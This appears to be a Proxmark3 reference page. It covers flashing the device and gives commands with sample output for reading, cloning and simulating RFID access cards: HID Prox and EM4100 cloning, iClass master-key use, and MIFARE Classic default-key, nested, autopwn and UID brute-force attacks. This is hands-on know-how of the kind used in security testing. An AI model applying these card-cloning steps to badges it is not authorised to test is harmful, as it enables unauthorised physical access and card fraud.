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Proxmark Website

Control Proxmark3 with Android Phone
RRG Android App for use with Proxmark3 RDV4 and the blueshark addon
Breaking Samsung firmware, or turning your S8/S9/S10 into a DIY “Proxmark”
Breaking Free from DRM: The Story of Hacking My Air Purifier

Flashing the Proxymark

Make sure the device is registered


Build Software

git clone
cd proxmark3
make clean && make all

Upgrading the Bootloader

  1. Unplug the device
  2. Hold the button and plug in the device
  3. Run the flasher command
    cd client
    ./flasher /dev/ttyACM0 -b ../bootrom/obj/bootrom.elf

Upgrading the Firmware

Run command when plugged in. Should Restart and

cd client
./flasher /dev/ttyACM0 ../armsrc/obj/fullimage.elf
cd ..

General Reading RFID Cards

Detect if high frequency or low frequency
lf search

hf search

Most low frequency tags don't have any kind of complex authentication scheme or any protection against replay attacks. It's a simple matter to scan an existing working card and create a clone.

Sniffing a Card

lf sniff

#Plot data on graph
data plot

# search and decode plot
lf search -1

Diffing a Card

data diff -a ../dumps/dump1.bin -b ../dumps/dump2.bin

Analyze data

View :

analyse lcr -d 007F864D7FA83A3D00CA8003000000

HID iClass (13.56 MHz)

Read Single Card

proxmark3> hf iclass reader

Try iClass Master key:

proxmark3> hf iclass permute --reverse --key 3F90EBF0910F7B6F

Read a iCLASS Block:

hf iclass rdbl -b 7 --ki 0

Write a iCLASS Block:

hf iclass wrbl -b 7 -d 6ce099fe7e614fd0 --ki 0

Encrypt iClass Block:

hf iclass encrypt -d 0000000f2aa3dba8

Simulate iCLASS:

pm3 --> hf iclass dump --ki 0
pm3 --> hf iclass eload -f hf-iclass-db883702f8ff12e0.bin
pm3 --> hf iclass sim -t 3

HID ProxCard (125 kHz)

Reading Card

Read Single Card

proxmark3> lf search  
#db# DownloadFPGA(len: 42096)
Reading 30000 bytes from device memory  
Data fetched  
Samples @ 8 bits/smpl, decimation 1:1  
NOTE: some demods output possible binary  
  if it finds something that looks like a tag
False Positives ARE possible  
Checking for known tags:  
HID Prox TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132  
Valid HID Prox ID Found!

Read Multable Cards

proxmark3> lf hid fskdemod  
#db# TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132                             
#db# Stopped

Cloning Card

This Tag ID is directly encoded from the Facility Code (19) and Card ID (8132). You can use some of the online 26 bit Wiegand calculators online to double check this for yourself.

This effectively means that you only need to know those numbers (which are printed on the card itself) to clone the card.

Use T5577 card with the command to clone the card and TAG ID

proxmark3> lf hid clone 2004263f88  
Cloning tag with ID 2004263f88  
#db# DONE!

EM4100x (125 kHz)

Reading Card

Read Single Card

proxmark3> lf search  
#db# DownloadFPGA(len: 42096)
Reading 30000 bytes from device memory  
Data fetched  
Samples @ 8 bits/smpl, decimation 1:1  
NOTE: some demods output possible binary  
  if it finds something that looks like a tag
False Positives ARE possible  
Checking for known tags:  
EM410x pattern found:  
EM TAG ID      : 8800180E55  
Unique TAG ID  : 11001870AA  
Possible de-scramble patterns  
HoneyWell IdentKey {  
DEZ 8          : 01576533  
DEZ 10         : 0001576533  
DEZ 5.5        : 00024.03669  
DEZ 3.5A       : 136.03669  
DEZ 3.5B       : 000.03669  
DEZ 3.5C       : 024.03669  
DEZ 14/IK2     : 00584117128789  
DEZ 15/IK3     : 000073016045738  
DEZ 20/ZK      : 01010000010807001010  
Other          : 03669_024_01576533  
Pattern Paxton : 2284604501 [0x882C4C55]  
Pattern 1      : 4457436 [0x4403DC]  
Pattern Sebury : 3669 24 1576533  [0xE55 0x18 0x180E55]  
Valid EM410x ID Found! 

Get Tag ID

proxmark3> lf em4x em410xdemod 1

#db# DownloadFPGA(len: 42096)
#db# EM TAG ID: 8800180e55 - (03669_024_01576533)

Cloning Card

Use T5577 card with the command to clone the card and TAG ID

proxmark3> lf em4x em410xwrite 8800180e55 1  
Writing T55x7 tag with UID 0x8800180e55 (clock rate: 64)

#db# Started writing T55x7 tag ...
#db# Clock rate: 64
#db# Tag T55x7 written with 0xffc62000e20ea94e

MIFARE Classic (13.56 MHz)

The MIFARE Classic 1K offers 1024 bytes of data storage, split into 16 sectors; each sector is protected by two different keys, called A and B. Each key can be programmed to allow operations such as reading, writing, increasing value blocks, etc.

One key is a default key that makes it possoble to read some data and not others

Exploiting the Nespresso smart cards for fun and profit coffee

Reading Card

Basic Info for card

proxmark3> hf search  
#db# DownloadFPGA(len: 42096)
 UID : bc 4e a5 35
ATQA : 00 04  
 SAK : 08 [2]
proprietary non iso14443-4 card found, RATS not supported  
Answers to chinese magic backdoor commands: NO  
Valid ISO14443A Tag Found - Quitting Search  

Some blocks are protected

Successful Block Read:

proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF  
--block no:0, key type:A, key:ff ff ff ff ff ff            
#db# READ BLOCK FINISHED                 
isOk:01 data:01 02 03 04 04 08 04 00 00 00 00 00 00 00 00 00  

Failed Block Read:

proxmark3> hf mf rdbl 5 A FFFFFFFFFFFF  
--block no:5, key type:A, key:ff ff ff ff ff ff            
#db# Authentication failed. Card timeout.                 
#db# Auth error                 
#db# READ BLOCK FINISHED                 

Test Default Keys

proxmark3> hf mf chk * ?  
No key specified, trying default keys  
chk default key[ 0] ffffffffffff  
chk default key[ 1] 000000000000  
chk default key[ 2] a0a1a2a3a4a5  
chk default key[ 3] b0b1b2b3b4b5  
chk default key[ 4] aabbccddeeff  
chk default key[ 5] 4d3a99c351dd  
chk default key[ 6] 1a982c7e459a  
chk default key[ 7] d3f7d3f7d3f7  
chk default key[ 8] 714c5c886e97  
chk default key[ 9] 587ee5f9350f  
chk default key[10] a0478cc39091  
chk default key[11] 533cb6c723f6  
chk default key[12] 8fd0a4f256e9  
--sector: 0, block:  3, key type:A, key count:13
Found valid key:[ffffffffffff]  
...omitted for brevity...
--sector:15, block: 63, key type:B, key count:13
Found valid key:[ffffffffffff]  

"Nested Attack" to extract other keys

proxmark3> hf mf nested 1 0 A ffffffffffff   d  
Testing known keys. Sector count=16  
uid:bc4ea535 trgbl=4 trgkey=0  
Found valid key:080808080808  
uid:bc4ea535 trgbl=8 trgkey=0  
Found valid key:080808080808  
Time in nested: 7.832 (3.916 sec per key)  
Iterations count: 2  
|sec|key A           |res|key B           |res|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  080808080808  | 1 |  ffffffffffff  | 1 |
|002|  080808080808  | 1 |  ffffffffffff  | 1 |
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
Printing keys to binary file dumpkeys.bin...  

Reading a block with a key

proxmark3> hf mf rdbl 5 A 080808080808  
--block no:5, key type:A, key:08 08 08 08 08 08            
#db# READ BLOCK FINISHED                 
isOk:01 data:00 0a 00 00 ff f5 ff ff 00 0a 00 00 05 fa 05 fa  

Clone Card

Auto extract and backup Keys:

hf mf autopwn

Bruteforce MIFARE Classic card numbers from 11223344 to 11223346:

script run hf_mf_uidbruteforce -s 0x11223344 -e 0x11223346 -t 1000 -x mfc

Bruteforce MIFARE Ultralight EV1 card numbers from 11223344556677 to 11223344556679:

script run hf_mf_uidbruteforce -s 0x11223344556677 -e 0x11223344556679 -t 1000 -x mfu

Using the keydump to dump a card

proxmark3> hf mf dump 1  
|------ Reading sector access bits...-----|
...omitted for brevity...
|----- Dumping all blocks to file... -----|
Successfully read block  0 of sector  0.  
...omitted for brevity...
Successfully read block  3 of sector 15.  
Dumped 64 blocks (1024 bytes) to file dumpdata.bin  

Restoring a card

hf mf restore 1

Restore a dead Card:

hf mf csetuid 12345678 0004 08


Find ATQA and SAK from ISO/IEC 14443 Type A Documentation

Reading a Block

proxmark3> hf mf rdbl 5 A 080808080808  
--block no:5, key type:A, key:08 08 08 08 08 08            
#db# READ BLOCK FINISHED                 
isOk:01 data:32 11 00 00 cd ee ff ff 32 11 00 00 05 fa 05 fa  

Writing a Block
proxmark3> hf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa  
--block no:5, key type:A, key:08 08 08 08 08 08           
--data: 32 11 00 00 cd ee ff ff 32 11 00 00 05 fa 05 fa           
#db# WRITE BLOCK FINISHED                 

Simulate a Card


hf mf sim -u 353c2aa6





  • Generic Card Reader
  • EM is a T55XX using ASK
  • HID Prox is a T55XX using FSK
  • Indala is a T55XX using PSK

Detect Type of Card:

lf t55xx detect